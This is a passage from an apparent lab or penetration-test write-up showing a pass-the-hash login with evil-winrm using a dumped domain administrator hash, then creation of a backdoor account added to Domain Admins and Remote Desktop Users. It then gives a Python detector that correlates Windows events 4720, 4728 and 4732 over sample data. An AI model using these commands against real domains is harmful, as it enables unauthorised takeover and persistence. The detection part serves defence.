Obtain the domain admin's hash from 151:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:48989de6a73f952ad51adceabc13cc9c:::

proxychains4 evil-winrm -u tricky.com\\\\administrator -H 48989de6a73f952ad51adceabc13cc9c -i 172.16.64.150


Add a user, then add it to the Domain Admins group and the Remote Desktop Users group.

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net user crack Passw0rd! /add /domain**
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
The command completed successfully.

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net localgroup "Remote Desktop Users" crack /add /domain**
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1088  ...  172.16.64.150:5985  ...  OK
The command completed successfully.

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net group "domain admins" crack /add /domain**
The command completed successfully.

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>
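
The three `net` commands above leave a recognizable trail in the domain controller's Security log: event 4720 for the new account, followed by 4732 and 4728 for the group additions. The following is an added example, not part of the original write-up, that correlates those events by SID over constructed sample records. The watched-group list, the 10-minute window, the SIDs and the `jsmith`/`helpdesk`/`Sales` names are assumptions.

```python
from datetime import datetime, timedelta

# Windows Security log event IDs: 4720 = user account created;
# 4728 / 4732 / 4756 = member added to a global / local / universal security group.
ACCOUNT_CREATED = 4720
MEMBER_ADDED = {4728, 4732, 4756}
# Assumptions: which groups count as sensitive, and the correlation window.
WATCHED_GROUPS = {"domain admins", "enterprise admins", "administrators",
                  "remote desktop users"}
WINDOW = timedelta(minutes=10)

def find_new_privileged_accounts(events):
    """Alert on accounts that are created and, within WINDOW, added to a watched group."""
    created = {}  # TargetSid of new account -> (creation time, name, creator)
    alerts = {}   # account SID -> alert record
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] == ACCOUNT_CREATED:
            created[ev["TargetSid"]] = (ev["TimeCreated"], ev["TargetUserName"],
                                        ev["SubjectUserName"])
        elif ev["EventID"] in MEMBER_ADDED:
            group = ev["TargetUserName"]  # in 4728/4732/4756 this field is the group
            hit = created.get(ev["MemberSid"])
            if (hit and group.lower() in WATCHED_GROUPS
                    and ev["TimeCreated"] - hit[0] <= WINDOW):
                alert = alerts.setdefault(ev["MemberSid"], {
                    "account": hit[1], "created_by": hit[2], "groups": []})
                alert["groups"].append(group)
    return list(alerts.values())

def make_event(event_id, ts, **fields):
    """Build a simplified event record (hypothetical helper for the sample data)."""
    return {"EventID": event_id, "TimeCreated": datetime.fromisoformat(ts), **fields}

# Constructed sample records (SIDs and the jsmith/helpdesk/Sales names are made up).
SID = "S-1-5-21-1111111111-2222222222-3333333333-"
SAMPLE_EVENTS = [
    make_event(4720, "2024-01-01T09:00:00", TargetSid=SID + "1600", TargetUserName="jsmith", SubjectUserName="helpdesk"),
    make_event(4728, "2024-01-01T09:01:00", MemberSid=SID + "1600", TargetUserName="Sales", SubjectUserName="helpdesk"),
    make_event(4720, "2024-01-01T10:00:00", TargetSid=SID + "1601", TargetUserName="crack", SubjectUserName="Administrator"),
    make_event(4732, "2024-01-01T10:00:20", MemberSid=SID + "1601", TargetUserName="Remote Desktop Users", SubjectUserName="Administrator"),
    make_event(4728, "2024-01-01T10:00:41", MemberSid=SID + "1601", TargetUserName="Domain Admins", SubjectUserName="Administrator"),
]

if __name__ == "__main__":
    for alert in find_new_privileged_accounts(SAMPLE_EVENTS):
        print(alert)
```

These events are only written when the "User Account Management" and "Security Group Management" audit subcategories are enabled on the domain controllers.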